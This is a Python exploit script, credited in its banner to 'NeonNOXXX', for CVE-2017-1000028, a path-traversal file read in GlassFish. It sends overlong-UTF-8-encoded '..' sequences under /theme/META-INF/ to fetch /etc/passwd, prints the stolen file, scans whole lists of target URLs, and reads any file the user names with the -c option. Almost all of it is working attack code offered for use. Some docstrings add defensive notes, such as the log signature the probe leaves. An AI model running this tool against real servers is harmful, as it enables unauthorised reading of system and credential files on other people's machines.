from bdb import checkfuncname
import urllib3
import argparse
import sys
import re
import requests
def banner():
    """Print the tool's credit line and a usage tip to stdout."""
    lines = (
        "CVE-2017-1000028 POC&EXP BY: NeonNOXXX",
        "TIPS:The mode -c only can be used in SingleUrl mode.",
    )
    for line in lines:
        print(line)
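def checkSingle(target):
    """Report whether one base URL answers the CVE-2017-1000028 probe.

    Requests ``/etc/passwd`` through the ``/theme/META-INF/`` path, with
    every ``..`` segment written as ``%c0%ae%c0%ae`` (``%c0%ae`` is an
    overlong UTF-8 encoding of ``.``), and prints a one-line verdict.
    The file contents are not printed. On the server side the probe shows
    up in access logs as a request under ``/theme/META-INF/`` containing
    ``%c0%ae``.

    Args:
        target: Base URL of the server (scheme and host, optionally a
            port). A trailing ``/`` is tolerated.

    If the request itself fails, ``[-]Error.`` is printed and the process
    exits with status 0.
    """
    headers = {
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36'
    }
    payload = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
    # Certificate verification is off (presumably to cope with self-signed
    # certificates), so the response is not authenticated: treat the verdict
    # as an indication, not proof.
    urllib3.disable_warnings()
    try:
        # The timeout keeps an unresponsive host from hanging the run forever.
        response = requests.get(
            target.rstrip('/') + payload,
            headers=headers,
            verify=False,
            timeout=10,
        )
    except requests.exceptions.RequestException:
        # Only transport/URL errors are handled here; Ctrl-C and programming
        # errors are no longer swallowed as they were by a bare ``except``.
        print('[-]Error.')
        sys.exit(0)
    print('[+]Proving on target : ', target)
    # Require a passwd-style "root:" line rather than the bare word "root",
    # which also occurs in ordinary HTML and would give false positives.
    has_root_entry = any(
        line.startswith('root:') for line in response.text.splitlines()
    )
    if response.status_code == 200 and has_root_entry:
        print(target + ' is vulnerable.')
    else:
        print(target + ' is not vulnerable.')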
#re1 = requests.get(target.strip("/") + payload,headers = headers,verify = True)
#print(re1.text)
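def checkSingleText(target):
    """Probe one base URL for CVE-2017-1000028 and print the returned file.

    Sends the same ``/theme/META-INF/`` request for ``/etc/passwd`` as the
    plain single-URL check (``..`` written as ``%c0%ae%c0%ae``), prints a
    verdict, and, when the response looks like a passwd file, prints the
    response body as well.

    Args:
        target: Base URL of the server (scheme and host, optionally a
            port). A trailing ``/`` is tolerated.

    If the request itself fails, ``[-]Error.`` is printed and the process
    exits with status 0.
    """
    headers = {
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36'
    }
    payload = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
    # Certificate verification is off (presumably to cope with self-signed
    # certificates), so the response is not authenticated: treat the verdict
    # as an indication, not proof.
    urllib3.disable_warnings()
    try:
        # The timeout keeps an unresponsive host from hanging the run forever.
        response = requests.get(
            target.rstrip('/') + payload,
            headers=headers,
            verify=False,
            timeout=10,
        )
    except requests.exceptions.RequestException:
        # Only transport/URL errors are handled here; Ctrl-C and programming
        # errors are no longer swallowed as they were by a bare ``except``.
        print('[-]Error.')
        sys.exit(0)
    print('[+]Proving on target : ', target)
    # Require a passwd-style "root:" line rather than the bare word "root",
    # which also occurs in ordinary HTML and would give false positives.
    has_root_entry = any(
        line.startswith('root:') for line in response.text.splitlines()
    )
    if response.status_code == 200 and has_root_entry:
        print('[+]' + target + ' is vulnerable.')
        print(response.text)
    else:
        print('[+]' + target + ' is not vulnerable.')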
#re1 = requests.get(target.strip("/") + payload,headers = headers,verify = True)
#print(re1.text)
def checkBunch(file):
    """Run the CVE-2017-1000028 probe against every URL listed in *file*.

    Args:
        file: Path of a text file with one base URL per line.

    Prints one verdict line per URL. NOTE(review): a URL is reported as
    vulnerable when the response is HTTP 200 and merely contains the
    substring ``root``, so ordinary pages can produce false positives.
    The request has no timeout and certificate verification is disabled.
    The first request that raises prints ``[-]Error.`` and ends the whole
    process with status 0, leaving the remaining lines unchecked.
    """
    request_headers = {
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36'
    }
    probe_path = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
    print('[+]Proving...')
    urllib3.disable_warnings()
    with open(file, 'r') as handle:
        entries = handle.readlines()
    for entry in entries:
        base_url = entry.strip('\n')
        try:
            response = requests.get(base_url + probe_path, headers=request_headers, verify=False)
            hit = response.status_code == 200 and 'root' in response.text
            verdict = ' is vulnerable.' if hit else ' is not vulnerable.'
            print('[+]' + base_url + verdict)
        except:
            # Bare except kept as in the original: any failure stops the run.
            print('[-]Error.')
            sys.exit(0)
def checkCustom(target,custom):
    """Request one file through the ``/theme/META-INF/`` traversal path and print it.

    Args:
        target: Base URL of the server, used exactly as given.
        custom: Path of the file on the server. It is appended directly
            after the last ``%c0%ae%c0%ae`` segment, so it has to begin
            with ``/``.

    Prints the response body on HTTP 200, otherwise
    ``Cannot read this file.``. NOTE(review): a 200 status is the only
    check, so an error page served with 200 is printed as if it were the
    file. The request has no timeout and certificate verification is
    disabled. Any exception prints ``[-]Error.`` and exits with status 0.
    """
    browser_headers = {
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36'
    }
    url = target + '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae' + custom
    urllib3.disable_warnings()
    try:
        response = requests.get(url, headers=browser_headers, verify=False)
        if response.status_code != 200:
            print('Cannot read this file.')
        else:
            print(response.text)
    except:
        # Bare except kept as in the original: every failure is reported the same way.
        print('[-]Error.')
        sys.exit(0)
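if __name__ == "__main__":
    # Command-line entry point: print the banner, parse the options and run
    # the selected check(s). All four options are optional and simply store
    # their value; the combinations are validated below.
    banner()
    parser = argparse.ArgumentParser(description='GlassFish Arbitrary File Reading(CVE-2017-1000028)')
    parser.add_argument('-u', action="store", dest="url", help="Single Target URL")
    parser.add_argument('-ut', action="store", dest="url_text", help="Output the passwd file of this Single Target URL")
    parser.add_argument('-f', action="store", dest="file", help="Read from url.txt")
    parser.add_argument('-c', action="store", dest="custom", help="Read the Custom File.")
    args = parser.parse_args()
    urllib3.disable_warnings()
    if not (args.url or args.file or args.url_text or args.custom):
        print("Please specify one option(-h / -u URL / -ut URL / -f url.txt / -u URL -c The file you want to read.).")
        sys.exit(1)
    # -c is only acted on together with -u; given alone it used to pass the
    # check above and then do nothing, so reject it explicitly.
    if args.custom and not args.url:
        parser.error("-c can only be used together with -u")
    if args.url:
        checkSingle(args.url)
    if args.file:
        checkBunch(args.file)
    if args.url_text:
        checkSingleText(args.url_text)
    if args.url and args.custom:
        checkCustom(args.url, args.custom)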
#payload:/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
###